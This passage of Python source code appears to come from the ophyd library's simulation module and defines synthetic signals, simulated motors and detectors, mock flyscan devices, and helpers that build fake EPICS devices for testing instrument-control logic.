super().__init__(*args, **kwargs)
self.set_finished()
class EnumSignal(Signal):
def __init__(self, *args, value=0, enum_strings, **kwargs):
super().__init__(*args, value=0, **kwargs)
self._enum_strs = tuple(enum_strings)
self._metadata['enum_strs'] = tuple(enum_strings)
self.put(value)
def put(self, value, **kwargs):
if value in self._enum_strs:
value = self._enum_strs.index(value)
elif isinstance(value, str):
err = f'{value} not in enum strs {self._enum_strs}'
raise ValueError(err)
return super().put(value, **kwargs)
def get(self, *, as_string=True, **kwargs):
"""
Implement getting as enum strings
"""
value = super().get()
if as_string:
if self._enum_strs is not None and isinstance(value, int):
return self._enum_strs[value]
elif value is not None:
return str(value)
return value
def describe(self):
desc = super().describe()
desc[self.name]['enum_strs'] = self._enum_strs
return desc
class SynSignal(Signal):
"""
A synthetic Signal that evaluates a Python function when triggered.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
kind : a member the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
# This signature is arranged to mimic the signature of EpicsSignal, where
# the Python function (func) takes the place of the PV.
def __init__(self, func=None, *,
name, # required, keyword-only
exposure_time=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
# When triggered, just put the current value.
func = self.get
# Initialize readback with 0.
self._readback = 0
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self._func = func
self.exposure_time = exposure_time
self.precision = precision
super().__init__(value=self._func(), timestamp=ttime.time(), name=name,
parent=parent, labels=labels, kind=kind, **kwargs)
self._metadata.update(
connected=True,
)
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.precision
return res
def trigger(self):
st = DeviceStatus(device=self)
delay_time = self.exposure_time
if delay_time:
def sleep_and_finish():
self.log.info('sleep_and_finish %s', self)
ttime.sleep(delay_time)
self.put(self._func())
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
self.put(self._func())
st.set_finished()
return st
def sim_set_func(self, func):
"""
Update the SynSignal function to set a new value on trigger.
"""
self._func = func
class SynSignalRO(SynSignal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def put(self, value, *, timestamp=None, force=False):
msg = f"{self}.put(value={value}, timestamp={timestamp}, force={force})"
self.log.error(msg)
raise ReadOnlyError(msg)
def set(self, value, *, timestamp=None, force=False):
msg = f"{self} is readonly"
self.log.error(msg)
raise ReadOnlyError(msg)
class SynPeriodicSignal(SynSignal):
"""
A synthetic Signal that evaluates a Python function periodically.
The signal value is updated in a background thread. To start the thread,
call the `start_simulation()` method before the beginning of simulation.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal generates white noise on [0, 1].
name : string, keyword only
period : number, optional
How often the Signal's value is updated in the background. Default is
1 second.
period_jitter : number, optional
Random Gaussian variation of the period. Default is 1 second.
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
kind : a member the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
def __init__(self, func=None, *,
name, # required, keyword-only
period=1, period_jitter=1,
exposure_time=0,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
func = np.random.rand
self._period = period
self._period_jitter = period_jitter
super().__init__(name=name, func=func,
exposure_time=exposure_time,
parent=parent, labels=labels, kind=kind,
**kwargs)
self.__thread = None
def start_simulation(self):
"""
Start background thread that performs periodic value updates. The method
should be called at least once before the beginning of simulation. Multiple
calls to the method are ignored.
"""
if self.__thread is None:
def periodic_update(ref, period, period_jitter):
while True:
signal = ref()
if not signal:
# Our target Signal has been garbage collected. Shut
# down the Thread.
return
signal.put(signal._func())
del signal
# Sleep for period +/- period_jitter.
ttime.sleep(
max(self._period + self._period_jitter * np.random.randn(), 0))
self.__thread = threading.Thread(target=periodic_update,
daemon=True,
args=(weakref.ref(self),
self._period,
self._period_jitter))
self.__thread.start()
def _start_simulation_deprecated(self):
"""Call `start_simulation` and print deprecation warning."""
if self.__thread is None:
msg = ("Deprecated API: Objects of SynPeriodicSignal must be initialized before simulation\n"
"by calling 'start_simulation()' method. Two such objects ('rand' and 'rand2') are\n"
"created by 'ophyd.sim' module. Call\n"
" rand.start_simulation() or rand2.start_simulation()\n"
"before the object is used.")
self.log.warning(msg)
self.start_simulation()
def trigger(self):
self._start_simulation_deprecated()
return super().trigger()
def get(self, **kwargs):
self._start_simulation_deprecated()
return super().get(**kwargs)
def put(self, *args, **kwargs):
self._start_simulation_deprecated()
super().put(*args, **kwargs)
def set(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().set(*args, **kwargs)
def read(self):
self._start_simulation_deprecated()
return super().read()
def subscribe(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().subscribe(*args, **kwargs)
class _ReadbackSignal(Signal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def get(self):
self._readback = self.parent.sim_state['readback']
return self._readback
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of
# generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['readback_ts']
def put(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
def set(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
class _SetpointSignal(Signal):
def put(self, value, *, timestamp=None, force=False):
self._readback = float(value)
self.parent.set(float(value))
def get(self):
self._readback = self.parent.sim_state['setpoint']
return self.parent.sim_state['setpoint']
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['setpoint_ts']
class SynAxis(Device):
"""
A synthetic settable Device mimic any 1D Axis (position, temperature).
Parameters
----------
name : string, keyword only
readback_func : callable, optional
When the Device is set to ``x``, its readback will be updated to
``f(x)``. This can be used to introduce random noise or a systematic
offset.
Expected signature: ``f(x) -> value``.
value : object, optional
The initial value. Default is 0.
delay : number, optional
Simulates how long it takes the device to "move". Default is 0 seconds.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
kind : a member the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
readback = Cpt(_ReadbackSignal, value=0, kind='hinted')
setpoint = Cpt(_SetpointSignal, value=0, kind='normal')
velocity = Cpt(Signal, value=1, kind='config')
acceleration = Cpt(Signal, value=1, kind='config')
unused = Cpt(Signal, value=1, kind='omitted')
SUB_READBACK = 'readback'
_default_sub = SUB_READBACK
def __init__(self, *,
name,
readback_func=None, value=0, delay=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if readback_func is None:
def readback_func(x):
return x
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self.sim_state = {}
self._readback_func = readback_func
self.delay = delay
self.precision = precision
# initialize values
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.sim_state['readback'] = readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
super().__init__(name=name, parent=parent, labels=labels, kind=kind,
**kwargs)
self.readback.name = self.name
def set(self, value):
old_setpoint = self.sim_state['setpoint']
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.setpoint._run_subs(sub_type=self.setpoint.SUB_VALUE,
old_value=old_setpoint,
value=self.sim_state['setpoint'],
timestamp=self.sim_state['setpoint_ts'])
def update_state():
old_readback = self.sim_state['readback']
self.sim_state['readback'] = self._readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
self.readback._run_subs(sub_type=self.readback.SUB_VALUE,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
self._run_subs(sub_type=self.SUB_READBACK,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
st = DeviceStatus(device=self)
if self.delay:
def sleep_and_finish():
ttime.sleep(self.delay)
update_state()
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
update_state()
st.set_finished()
return st
@property
def position(self):
return self.readback.get()
class SynAxisEmptyHints(SynAxis):
@property
def hints(self):
return {}
class SynAxisNoHints(SynAxis):
readback = Cpt(_ReadbackSignal, value=0, kind='omitted')
@property
def hints(self):
raise AttributeError
class SynGauss(Device):
"""
Evaluate a point on a Gaussian based on the value of a motor.
Parameters
----------
name : string
motor : Device
motor_field : string
center : number
center of peak
Imax : number
max intensity of peak
sigma : number, optional
Default is 1.
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak.
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
random_state : numpy random state object, optional
np.random.RandomState(0), to generate random number with given seed
Example
-------
motor = SynAxis(name='motor')
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
"""
def _compute(self):
m = self._motor.read()[self._motor_field]['value']
# we need to do this one at a time because
# - self.read() may be screwed with by the user
# - self.get() would cause infinite recursion
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-(m - center) ** 2 /
(2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def __init__(self, name, motor, motor_field, center, Imax,
*, random_state=None,
**kwargs):
set_later = {}
for k in ('sigma', 'noise', 'noise_multiplier'):
v = kwargs.pop(k, None)
if v is not None:
set_later[k] = v
super().__init__(name=name, **kwargs)
self._motor = motor
self._motor_field = motor_field
self.center.put(center)
self.Imax.put(Imax)
self.random_state = random_state or np.random
self.val.name = self.name
self.val.sim_set_func(self._compute)
for k, v in set_later.items():
getattr(self, k).put(v)
self.trigger()
def subscribe(self, *args, **kwargs):
return self.val.subscribe(*args, **kwargs)
def clear_sub(self, cb, event_type=None):
return self.val.clear_sub(cb, event_type=event_type)
def unsubscribe(self, cid):
return self.val.unsubscribe(cid)
def unsubscribe_all(self):
return self.val.unsubscribe_all()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
@property
def precision(self):
return self.val.precision
@precision.setter
def precision(self, v):
self.val.precision = v
@property
def exposure_time(self):
return self.val.exposure_time
@exposure_time.setter
def exposure_time(self, v):
self.val.exposure_time = v
class Syn2DGauss(Device):
"""
Evaluate a point on a Gaussian based on the value of a motor.
Parameters
----------
name : str
The name of the detector
motor0 : SynAxis
The 'x' coordinate of the 2-D gaussian blob
motor_field0 : str
The name field of the motor. Should be the key in motor0.describe()
motor1 : SynAxis
The 'y' coordinate of the 2-D gaussian blob
motor_field1 : str
The name field of the motor. Should be the key in motor1.describe()
center : iterable, optional
The center of the gaussian blob
Defaults to (0,0)
Imax : float, optional
The intensity at `center`
Defaults to 1
sigma : float, optional
Standard deviation for gaussian blob
Defaults to 1
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak..
Defaults to None
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
Defaults to 1
random_state : numpy random state object, optional
np.random.RandomState(0), to generate random number with given seed
Example
-------
motor = SynAxis(name='motor')
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
"""
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def _compute(self):
x = self._motor0.read()[self._motor_field0]['value']
y = self._motor1.read()[self._motor_field1]['value']
m = np.array([x, y])
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-np.sum((m - center) ** 2) / (2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
def __init__(self, name, motor0, motor_field0, motor1, motor_field1,
center, Imax, sigma=1, noise="none", noise_multiplier=1,
random_state=None, **kwargs):
super().__init__(name=name, **kwargs)
self._motor0 = motor0
self._motor1 = motor1
self._motor_field0 = motor_field0
self._motor_field1 = motor_field1
self.center.put(center)
self.Imax.put(Imax)
self.sigma.put(sigma)
self.noise.put(noise)
self.noise_multiplier.put(noise_multiplier)
if random_state is None:
random_state = np.random
self.random_state = random_state
self.val.name = self.name
self.val.sim_set_func(self._compute)
self.trigger()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
class TrivialFlyer:
"""Trivial flyer that complies to the API but returns empty data."""
name = 'trivial_flyer'
parent = None
def kickoff(self):
return NullStatus()
def describe_collect(self):
return {'stream_name': {}}
def read_configuration(self):
return OrderedDict()
def describe_configuration(self):
return OrderedDict()
def complete(self):
return NullStatus()
def collect(self):
for i in range(100):
yield {'data': {}, 'timestamps': {}, 'time': i, 'seq_num': i}
def stop(self, *, success=False):
pass
class NewTrivialFlyer(TrivialFlyer):
"""
The old-style API inserted Resource and Datum documents into a database
directly. The new-style API only caches the documents and provides an
interface (collect_asset_docs) for accessing that cache. This change was
part of the "asset refactor" that changed that way Resource and Datum
documents flowed through ophyd, bluesky, and databroker. Trivial flyer that
complies to the API but returns empty data.
"""
name = 'new_trivial_flyer'
def collect_asset_docs(self):
for _ in ():
yield _
class MockFlyer:
"""
Class for mocking a flyscan API implemented with stepper motors.
"""
def __init__(self, name, detector, motor, start, stop, num, **kwargs):
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = np.linspace(start, stop, num)
self._data = deque()
self._completion_status = None
self._lock = threading.RLock()
sentinel = object()
loop = kwargs.pop("loop", sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2,
)
if kwargs:
raise TypeError(
f"{self.__class__}.__init__ got unexpected "
f"keyword arguments {list(kwargs)}"
)
def __setstate__(self, val):
name, detector, motor, steps = val
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = steps
self._completion_status = None
def __getstate__(self):
return (self.name, self._detector, self._mot, self._steps)
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe_collect(self):
dd = dict()
dd.update(self._mot.describe())
dd.update(self._detector.describe())
return {self.name: dd}
def complete(self):
if self._completion_status is None:
raise RuntimeError("No collection in progress")
return self._completion_status
def kickoff(self):
if self._completion_status is not None and not self._completion_status.done:
raise RuntimeError("Kicking off a second time?!")
self._data = deque()
st = DeviceStatus(device=self)
self._completion_status = st
def flyer_worker():
self._scan()
st.set_finished()
threading.Thread(target=flyer_worker, daemon=True).start()
kickoff_st = DeviceStatus(device=self)
kickoff_st.set_finished()
return kickoff_st
def collect(self):
with self._lock:
data = list(self._data)
self._data.clear()
yield from data
def _scan(self):
"This will be run on a separate thread, started in self.kickoff()"
ttime.sleep(0.1)
for p in self._steps:
stat = self._mot.set(p)
stat.wait()
stat = self._detector.trigger()
stat.wait()
event = dict()
event["time"] = ttime.time()
event["data"] = dict()
event["timestamps"] = dict()
for r in [self._mot, self._detector]:
d = r.read()
for k, v in d.items():
event["data"][k] = v["value"]
event["timestamps"][k] = v["timestamp"]
with self._lock:
self._data.append(event)
def stop(self, *, success=False):
pass
class SynSignalWithRegistry(SynSignal):
"""
A SynSignal integrated with databroker.assets
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
reg : Registry, optional
DEPRECATED. If used, this is ignored and a warning is issued. In a
future release, this parameter will be removed.
save_path : str, optional
Path to save files to, if None make a temp dir, defaults to None.
save_func : function, optional
The function to save the data, function signature must be:
`func(file_path, array)`, defaults to np.save
save_spec : str, optional
The spec for the save function, defaults to 'RWFS_NPY'
save_ext : str, optional
The extension to add to the file name, defaults to '.npy'
"""
def __init__(self, *args, save_path=None,
save_func=partial(np.save, allow_pickle=False),
save_spec='NPY_SEQ', save_ext='npy', **kwargs):
super().__init__(*args, **kwargs)
self.save_func = save_func
self.save_ext = save_ext
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache = deque()
if save_path is None:
self.save_path = mkdtemp()
else:
self.save_path = save_path
self._spec = save_spec # spec name stored in resource doc
self._file_stem = None
self._path_stem = None
self._result = {}
def stage(self):
self._file_stem = short_uid()
self._datum_counter = itertools.count()
self._path_stem = os.path.join(self.save_path, self._file_stem)
# This is temporarily more complicated than it will be in the future.
# It needs to support old configurations that have a registry.
resource = {'spec': self._spec,
'root': self.save_path,
'resource_path': self._file_stem,
'resource_kwargs': {},
'path_semantics': {'posix': 'posix', 'nt': 'windows'}[os.name]}
self._resource_uid = new_uid()
resource['uid'] = self._resource_uid
self._asset_docs_cache.append(('resource', resource))
def trigger(self):
super().trigger()
# save file stash file name
self._result.clear()
for idx, (name, reading) in enumerate(super().read().items()):
# Save the actual reading['value'] to disk. For a real detector,
# this part would be done by the detector IOC, not by ophyd.
data_counter = next(self._datum_counter)
self.save_func('{}_{}.{}'.format(self._path_stem, data_counter,
self.save_ext), reading['value'])
# This is temporarily more complicated than it will be in the
# future. It needs to support old configurations that have a
# registry.
datum = {'resource': self._resource_uid,
'datum_kwargs': dict(index=data_counter)}
# If a Registry is not set, we need to generate the datum_id.
datum_id = '{}/{}'.format(self._resource_uid,
data_counter)
datum['datum_id'] = datum_id
self._asset_docs_cache.append(('datum', datum))
# And now change the reading in place, replacing the value with
# a reference to Registry.
reading['value'] = datum_id
self._result[name] = reading
return NullStatus()
def read(self):
return self._result
def describe(self):
res = super().describe()
for key in res:
res[key]['external'] = "FILESTORE"
return res
def collect_asset_docs(self):
items = list(self._asset_docs_cache)
self._asset_docs_cache.clear()
for item in items:
yield item
def unstage(self):
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache.clear()
self._file_stem = None
self._path_stem = None
self._result.clear()
class NumpySeqHandler:
specs = {'NPY_SEQ'}
def __init__(self, filename, root=''):
self._name = os.path.join(root, filename)
def __call__(self, index):
return np.load('{}_{}.npy'.format(self._name, index),
allow_pickle=False)
def get_file_list(self, datum_kwarg_gen):
"This method is optional. It is not needed for access, but for export."
return ['{name}_{index}.npy'.format(name=self._name, **kwargs)
for kwargs in datum_kwarg_gen]
class ABDetector(Device):
a = Cpt(SynSignal, func=random.random, kind=Kind.hinted)
b = Cpt(SynSignal, func=random.random)
def trigger(self):
return self.a.trigger() & self.b.trigger()
class DetWithCountTime(Device):
intensity = Cpt(SynSignal, func=lambda: 0, kind=Kind.hinted)
count_time = Cpt(Signal)
class DetWithConf(Device):
a = Cpt(SynSignal, func=lambda: 1, kind=Kind.hinted)
b = Cpt(SynSignal, func=lambda: 2, kind=Kind.hinted)
c = Cpt(SynSignal, func=lambda: 3)
d = Cpt(SynSignal, func=lambda: 4)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read_attrs = ['a', 'b']
self.configuration_attrs = ['c', 'd']
def trigger(self):
return self.a.trigger() & self.b.trigger()
class InvariantSignal(SynSignal):
# Always returns the same reading, including timestamp.
def read(self):
res = super().read()
for k in res:
res[k]['timestamp'] = 0
return res
def __repr__(self):
return "<INVARIANT REPR>"
class SPseudo3x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), egu='a', kind=Kind.hinted)
pseudo2 = Cpt(PseudoSingle, limits=(-10, 10), egu='b', kind=Kind.hinted)
pseudo3 = Cpt(PseudoSingle, limits=None, egu='c', kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
sig = Cpt(Signal, value=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo2,
real3=-pseudo_pos.pseudo3)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1,
pseudo2=-real_pos.real2,
pseudo3=-real_pos.real3)
class SPseudo1x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo1,
real3=-pseudo_pos.pseudo1)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1)
class SynAxisNoPosition(SynAxis):
@property
def position(self):
raise AttributeError
def make_fake_device(cls):
"""
Inspect cls and construct a fake device that has the same structure.
This works by replacing EpicsSignal with FakeEpicsSignal and EpicsSignalRO
with FakeEpicsSignalRO. The fake class will be a subclass of the real
class.
This assumes that EPICS connections are done entirely in EpicsSignal and
EpicsSignalRO subcomponents. If this is not true, this will fail silently
on class construction and loudly when manipulating an object.
Parameters
----------
cls : Device
A real Device class to inspect and create a fake Device class from
Returns
-------
fake_device : Device
The resulting fake Device class
"""
# Cache to avoid repeating work.
# EpicsSignal and EpicsSignalRO begin in the cache.
if cls not in fake_device_cache:
if not issubclass(cls, Device):
# Ignore non-devices and non-epics-signals
logger.debug('Ignore cls=%s, bases are %s', cls, cls.__bases__)
fake_device_cache[cls] = cls
return cls
fake_dict = {}
# Update all the components recursively
for cpt_name in cls.component_names:
cpt = getattr(cls, cpt_name)
if isinstance(cpt, DDCpt):
# Make a regular Cpt out of the DDC, as it already has
# been generated
fake_cpt = Cpt(cls=cpt.cls, suffix=cpt.suffix,
lazy=cpt.lazy,
trigger_value=cpt.trigger_value,
kind=cpt.kind, add_prefix=cpt.add_prefix,
doc=cpt.doc, **cpt.kwargs,
)
else:
fake_cpt = copy.copy(cpt)
fake_cpt.cls = make_fake_device(cpt.cls)
logger.debug('switch cpt_name=%s to cls=%s', cpt_name,
fake_cpt.cls)
fake_dict[cpt_name] = fake_cpt
fake_class = type('Fake{}'.format(cls.__name__), (cls,), fake_dict)
fake_device_cache[cls] = fake_class
logger.debug('fake_device_cache[%s] = %s', cls, fake_class)
return fake_device_cache[cls]
def clear_fake_device(dev, *, default_value=0, default_string_value='',
ignore_exceptions=False):
'''Clear a fake device by setting all signals to a specific value
Parameters
----------
dev : Device
The fake device
default_value : any, optional
The value to put to non-string components
default_string_value : any, optional
The value to put to components determined to be strings
ignore_exceptions : bool, optional
Ignore any exceptions raised by `sim_put`
Returns
-------
all_values : list
List of all (signal_instance, value) that were set
'''
all_values = []
for walk in dev.walk_signals(include_lazy=True):
sig = walk.item
if not hasattr(sig, 'sim_put'):
continue
try:
string = getattr(sig, 'as_string', False)
value = (default_string_value
if string
else default_value)
sig.sim_put(value)
except Exception:
if not ignore_exceptions:
raise
else:
all_values.append((sig, value))
return all_values
def instantiate_fake_device(dev_cls, *, name=None, prefix='_prefix',
**specified_kw):
'''Instantiate a fake device, optionally specifying some initializer kwargs
If unspecified, all initializer keyword arguments will default to the
string f"_{argument_name}_".
Parameters
----------
dev_cls : class
The device class to instantiate. This is allowed to be a regular
device, as `make_fake_device` will be called on it first.
name : str, optional
The instantiated device name
prefix : str, optional
The instantiated device prefix
**specified_kw :
Keyword arguments to override with a specific value
Returns
-------
dev : dev_cls instance
The instantiated fake device
'''
dev_cls = make_fake_device(dev_cls)
sig = inspect.signature(dev_cls)
ignore_kw = {'kind', 'read_attrs', 'configuration_attrs', 'parent',
'args', 'name', 'prefix'}
def get_kwarg(name, param):
default = param.default
if default == param.empty:
# NOTE: could check param.annotation here
default = '_{}_'.format(param.name)
return specified_kw.get(name, default)
kwargs = {name: get_kwarg(name, param)
for name, param in sig.parameters.items()
if param.kind != param.VAR_KEYWORD and
name not in ignore_kw
}
kwargs['name'] = (name if name is not None else dev_cls.__name__)
kwargs['prefix'] = prefix
return dev_cls(**kwargs)
class FakeEpicsSignal(SynSignal):
"""
Fake version of EpicsSignal that's really just a SynSignal.
Wheras SynSignal is generally used to test plans, FakeEpicsSignal is
generally used in conjunction with make_fake_device to test any logic
inside of a Device subclass.
Unlike in SynSignal, this class is generally instantiated inside of a
subcomponent generated automatically by make_fake_device. This means we
need extra hooks for modifying the signal's properties after the class
instantiates.
We can emulate EpicsSignal features here. We currently emulate the put
limits and some enum handling.
"""
_metadata_keys = EpicsSignal._metadata_keys
def __init__(self, read_pv, write_pv=None, *, put_complete=False,
string=False, limits=False, auto_monitor=False, name=None,
**kwargs):
"""
Mimic EpicsSignal signature
"""
self.as_string = string
self._enum_strs = None
super().__init__(name=name, **kwargs)
self._use_limits = limits
self._put_func = None
self._limits = None
self._metadata.update(
connected=True,
)
def describe(self):
desc = super().describe()
if self._enum_strs is not None:
desc[self.name]['enum_strs'] = self.enum_strs
return desc
def sim_set_putter(self, putter):
"""
Define arbirary behavior on signal put.
This can be used to emulate basic IOC behavior.
"""
self._put_func = putter
def get(self, *, as_string=None, connection_timeout=1.0, **kwargs):
"""
Implement getting as enum strings
"""
if as_string is None:
as_string = self.as_string
value = super().get()
if as_string:
if self.enum_strs is not None and isinstance(value, int):
return self.enum_strs[value]
elif value is not None:
return str(value)
return value
def put(self, value, *args,
connection_timeout=0.0,
callback=None,
use_complete=None,
timeout=0.0,
wait=True,
**kwargs):
"""
Implement putting as enum strings and put functions
Notes
-----
FakeEpicsSignal varies in subtle ways from the real class.
* put-completion callback will _not_ be called.
* connection_timeout, use_complete, wait, and timeout are ignored.
"""
if self.enum_strs is not None:
if value in self.enum_strs:
value = self.enum_strs.index(value)
elif isinstance(value, str):
err = '{} not in enum strs {}'.format(value, self.enum_strs)
raise ValueError(err)
if self._put_func is not None:
return self._put_func(value, *args, **kwargs)
return super().put(value, *args, **kwargs)
def sim_put(self, *args, **kwargs):
"""
Update the read-only signal's value.
Implement here instead of FakeEpicsSignalRO so you can call it with
every fake signal.
"""
force = kwargs.pop('force', True)
# The following will emit SUB_VALUE:
ret = Signal.put(self, *args, force=force, **kwargs)
# Also, ensure that SUB_META has been emitted:
self._run_subs(sub_type=self.SUB_META, **self._metadata)
return ret
@property
def enum_strs(self):
"""
Simulated enum strings.
Use sim_set_enum_strs during setup to set the enum strs.
"""
return self._enum_strs
def sim_set_enum_strs(self, enums):
"""
Set the enum_strs for a fake device
Parameters
----------
enums: list or tuple of str
The enums will be accessed by array index, e.g. the first item in
enums will be 0, the next will be 1, etc.
"""
self._enum_strs = tuple(enums)
self._metadata['enum_strs'] = tuple(enums)
self._run_subs(sub_type=self.SUB_META, **self._metadata)
@property
def limits(self):
return self._limits
def sim_set_limits(self, limits):
"""
Set the fake signal's limits.
"""
self._limits = limits
def check_value(self, value):
"""
Implement some of the checks from EpicsSignal
"""
super().check_value(value)
if value is None:
raise ValueError('Cannot write None to EPICS PVs')
if self._use_limits and not self.limits[0] <= value <= self.limits[1]:
raise LimitError(f'value={value} not within limits {self.limits}')
class FakeEpicsSignalRO(SynSignalRO, FakeEpicsSignal):
"""
Read-only FakeEpicsSignal
"""
_metadata_keys = EpicsSignalRO._metadata_keys
class FakeEpicsSignalWithRBV(FakeEpicsSignal):
"""
FakeEpicsSignal with PV and PV_RBV; used in the AreaDetector PV naming
scheme
"""
_metadata_keys = EpicsSignalWithRBV._metadata_keys
def __init__(self, prefix, **kwargs):
super().__init__(prefix + '_RBV', write_pv=prefix, **kwargs)
fake_device_cache = {EpicsSignal: FakeEpicsSignal,
EpicsSignalRO: FakeEpicsSignalRO,
EpicsSignalWithRBV: FakeEpicsSignalWithRBV,
}
class DirectImage(Device):
img = Cpt(SynSignal, kind='hinted')
def __init__(self, *args, func=None, **kwargs):
super().__init__(*args, **kwargs)
if func is not None:
self.img.sim_set_func(func)
def trigger(self):
return self.img.trigger()
def hw(save_path=None):
"Build a set of synthetic hardware (hence the abbreviated name, hw)"
motor = SynAxis(name='motor', labels={'motors'})
